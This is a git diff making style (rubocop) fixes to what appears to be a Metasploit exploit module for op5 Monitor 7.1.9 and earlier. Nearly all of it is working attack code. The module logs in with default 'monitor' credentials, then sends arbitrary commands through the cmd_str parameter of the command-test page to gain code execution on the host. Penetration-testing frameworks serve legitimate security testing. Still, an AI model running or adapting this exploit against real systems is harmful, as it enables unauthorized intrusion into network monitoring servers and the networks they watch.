rubocop fixes
parent
68d647edf1
commit
c2699ef194
|
@ -6,19 +6,20 @@
|
|||
require 'msf/core'
|
||||
|
||||
class MetasploitModule < Msf::Exploit::Remote
|
||||
|
||||
include Msf::Exploit::Remote::HttpClient
|
||||
include Msf::Exploit::CmdStager
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
super(
|
||||
update_info(
|
||||
info,
|
||||
'Name' => 'op5 v7.1.9 Configuration Command Execution',
|
||||
'Description' => %q{
|
||||
'Description' => %q(
|
||||
op5 an open source network monitoring software.
|
||||
The configuration page in version 7.1.9 and below
|
||||
allows the ability to test a system command, which
|
||||
can be abused to run arbitrary code as an unpriv user.
|
||||
},
|
||||
),
|
||||
'Author' =>
|
||||
[
|
||||
'h00die <mike@stcyrsecurity.com>', # module
|
||||
|
@ -26,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
],
|
||||
'References' =>
|
||||
[
|
||||
[ 'URL', 'https://www.exploit-db.com/exploits/39676/' ],
|
||||
[ 'EDB', '39676' ],
|
||||
[ 'URL', 'https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/']
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
|
@ -35,36 +36,38 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'DefaultOptions' => { 'SSL' => true },
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'Automatic Target', { }]
|
||||
[ 'Automatic Target', {}]
|
||||
],
|
||||
'DefaultTarget' => 0,
|
||||
'DisclosureDate' => 'Apr 08 2016',
|
||||
))
|
||||
'DisclosureDate' => 'Apr 08 2016'
|
||||
)
|
||||
)
|
||||
|
||||
register_options(
|
||||
[
|
||||
Opt::RPORT(443),
|
||||
OptString.new('USERNAME', [ true, 'User to login with', 'monitor']),
|
||||
OptString.new('PASSWORD', [ false, 'Password to login with', 'monitor']),
|
||||
OptString.new('TARGETURI', [ true, 'The path to the application', '/']),
|
||||
], self.class)
|
||||
OptString.new('TARGETURI', [ true, 'The path to the application', '/'])
|
||||
], self.class
|
||||
)
|
||||
end
|
||||
|
||||
def check()
|
||||
def check
|
||||
begin
|
||||
res = send_request_cgi({
|
||||
res = send_request_cgi(
|
||||
'uri' => datastore['TARGETURI'],
|
||||
'method' => 'GET',
|
||||
})
|
||||
'method' => 'GET'
|
||||
)
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
|
||||
/Version: (?<version_high>[\d]{1,2})\.(?<version_med>[\d]{1,2})\.(?<version_low>[\d]{1,2})[\s]+\|/ =~ res.body
|
||||
|
||||
if version_high && version_med && version_low &&\
|
||||
version_high.to_i <= 7 &&\
|
||||
version_med.to_i <= 1 &&\
|
||||
if version_high && version_med && version_low && \
|
||||
version_high.to_i <= 7 && \
|
||||
version_med.to_i <= 1 && \
|
||||
version_low.to_i <= 9
|
||||
vprint_good("Version Detected: #{[version_high, version_med, version_low].join(".")}")
|
||||
Exploit::CheckCode::Vulnerable
|
||||
vprint_good("Version Detected: #{[version_high, version_med, version_low].join('.')}")
|
||||
Exploit::CheckCode::Appears
|
||||
else
|
||||
Exploit::CheckCode::Safe
|
||||
end
|
||||
|
@ -76,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
def exploit
|
||||
execute_cmdstager(
|
||||
:flavor => :echo,
|
||||
:nodelete => true,
|
||||
:nodelete => true
|
||||
)
|
||||
end
|
||||
|
||||
|
@ -85,21 +88,21 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
# To manually view the vuln page, click Manage > Configure > Commands.
|
||||
# Click the "Test this command" button to display the form we abuse.
|
||||
|
||||
#login
|
||||
# login
|
||||
login_data = 'csrf_token='
|
||||
login_data << "&username=#{datastore['USERNAME']}"
|
||||
login_data << "&password=#{datastore['PASSWORD']}"
|
||||
|
||||
res = send_request_cgi({
|
||||
res = send_request_cgi(
|
||||
'uri' => "#{datastore['TARGETURI']}monitor/index.php/auth/login?uri=tac%2Findex",
|
||||
'method' => 'POST',
|
||||
'data' => login_data
|
||||
})
|
||||
)
|
||||
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 302
|
||||
cookie = res.get_cookies
|
||||
#exploit
|
||||
res = send_request_cgi({
|
||||
# exploit
|
||||
res = send_request_cgi(
|
||||
'uri' => "/monitor/op5/nacoma/command_test.php",
|
||||
'method' => 'GET',
|
||||
'cookie' => cookie,
|
||||
|
@ -107,9 +110,9 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
{
|
||||
'cmd_str' => cmd
|
||||
}
|
||||
})
|
||||
)
|
||||
|
||||
#success means we hang our session, and wont get back a response
|
||||
# success means we hang our session, and wont get back a response
|
||||
if res
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
|
||||
fail_with(Failure::UnexpectedReply, "#{peer} - Credentials need additional privileges") if res.body =~ /Access Denied/
|
||||
|
|
Loading…
Reference in New Issue